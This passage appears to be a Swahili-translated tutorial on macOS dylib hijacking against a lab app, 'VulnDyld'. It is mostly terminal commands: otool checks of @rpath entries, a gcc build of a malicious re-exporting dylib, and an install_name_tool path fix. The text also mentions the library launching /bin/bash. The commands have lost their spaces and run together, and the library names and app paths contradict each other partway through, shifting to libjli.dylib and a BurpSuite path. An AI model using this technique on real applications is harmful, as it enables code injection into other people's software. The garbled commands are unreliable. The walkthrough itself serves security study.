# Check where are the @rpath locationsotool-l"/Applications/VulnDyld.app/Contents/Resources/lib/binary"|grepLC_RPATH-A2cmdLC_RPATHcmdsize32path@loader_path/. (offset 12)--cmdLC_RPATHcmdsize32path@loader_path/../lib2 (offset 12)
# Check librareis loaded using @rapth and the used versionsotool-l"/Applications/VulnDyld.app/Contents/Resources/lib/binary"|grep"@rpath"-A3name@rpath/lib.dylib (offset 24)time stamp 2 Thu Jan 1 01:00:02 1970currentversion1.0.0compatibilityversion1.0.0# Check the versions
Kutokana na taarifa tulizopata hapo awali tunajua kwamba haikagua saini ya maktaba zilizopakiwa na inajaribu kupakia maktaba kutoka:
Kwa hivyo, ni rahisi kuiteka! Unda maktaba ambayo inatekeleza nambari isiyo ya kawaida na kuuza nje kazi sawa kama maktaba halali kwa kuiuza nje. Na kumbuka kuichakata na toleo lililotarajiwa:
gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport
Njia ya reexport iliyoundwa kwenye maktaba ni ya kulinganisha na mzigo, tugeuze iwe njia kamili kwa maktaba ya kuuza:
#Check relativeotool-l/tmp/lib.dylib|grepREEXPORT-A2cmdLC_REEXPORT_DYLIBcmdsize48name@rpath/libjli.dylib (offset 24)#Change the location of the library absolute to absolute pathinstall_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib
# Check againotool-l/tmp/lib.dylib|grepREEXPORT-A2cmdLC_REEXPORT_DYLIBcmdsize128name/Applications/BurpSuiteProfessional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)
Ikiwa unapanga kujaribu kuingiza maktaba kwenye binaries ambazo hazikutazamiwa, unaweza kuangalia ujumbe wa matukio ili kujua lini maktaba inapakia ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa /bin/bash).